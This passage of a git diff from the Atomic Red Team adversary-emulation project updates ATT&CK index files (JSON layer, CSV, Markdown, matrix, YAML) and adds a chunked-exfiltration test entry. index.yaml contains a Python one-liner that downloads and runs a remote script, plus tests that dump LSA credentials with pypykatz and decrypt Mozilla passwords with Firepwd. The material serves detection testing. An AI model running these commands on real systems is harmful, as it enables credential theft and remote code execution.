Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2a69beb328..e766aaa92c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1900,6 +1900,7 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh +exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e6fd7d3be5..d757c94202 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1244,6 +1244,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell +exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 98a89eb663..7e2c164db3 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2736,6 +2736,7 @@ - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows] - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - Atomic Test #1: Data Transfer Size Limits [macos, linux] + - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows] - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 0b98be71d4..185f388f25 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1835,7 +1835,8 @@ - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows] - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows] -- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1030 Data Transfer Size Limits](../../T1030/T1030.md) + - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows] - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows] diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 0c7025e1a6..205a1d5141 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -15,7 +15,7 @@ | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) | | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 52be490327..ef25790853 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -52301,7 +52301,8 @@ execution: which_python=$(which python || which python3 || which python3.9 || which python2) $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)' name: sh - cleanup_command: "rm #{payload_file_name} \n" + cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2> + nul\n" - name: Execute Python via scripts auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 description: Create Python file (.py) that downloads and executes shell script @@ -82666,44 +82667,51 @@ credential-access: elevation_required: true - name: Registry parse with pypykatz auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - description: 'Parses registry hives to obtain stored credentials + description: | + Parses registry hives to obtain stored credentials. - ' + Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. supported_platforms: - windows - dependency_executor_name: command_prompt + input_arguments: + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002 + dependency_executor_name: powershell dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: | - py -3 --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "Python 3 must be installed manually" + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' - - description: 'Computer must have pip installed + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null + invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" + Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait + - description: 'Computer must have venv configured at #{venv_path} ' - prereq_command: | - py -3 -m pip --version >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'echo "PIP must be installed manually" + prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit + 1 } ' - - description: 'pypykatz must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" ' - prereq_command: | - pypykatz -h >nul 2>&1 - exit /b %errorlevel% - get_prereq_command: 'pip install pypykatz + - description: "pypykatz must be installed \n" + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } ' - executor: - command: 'pypykatz live registry + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + pypykatz 2>&1 | Out-Null ' + executor: + command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n" name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -85630,14 +85638,16 @@ credential-access: auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381 description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.\nUpon successful execution, the decrypted credentials - will be output to a text file, as well as displayed on screen. \n" + will be output to a text file, as well as displayed on screen. \n\nWill create + a Python virtual environment within the External Payloads folder that can + be deleted manually post test execution.\n" supported_platforms: - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py type: string - default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py Out_Filepath: description: Filepath to output results to type: string @@ -85650,17 +85660,12 @@ credential-access: description: Filepath to python type: string default: C:\Program Files\Python310\python.exe + venv_path: + description: Path to the folder for the tactics venv + type: string + default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004 dependency_executor_name: powershell dependencies: - - description: 'Firepwd must exist at #{Firepwd_Path} - - ' - prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} - - ' - get_prereq_command: | - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null - Invoke-WebRequest 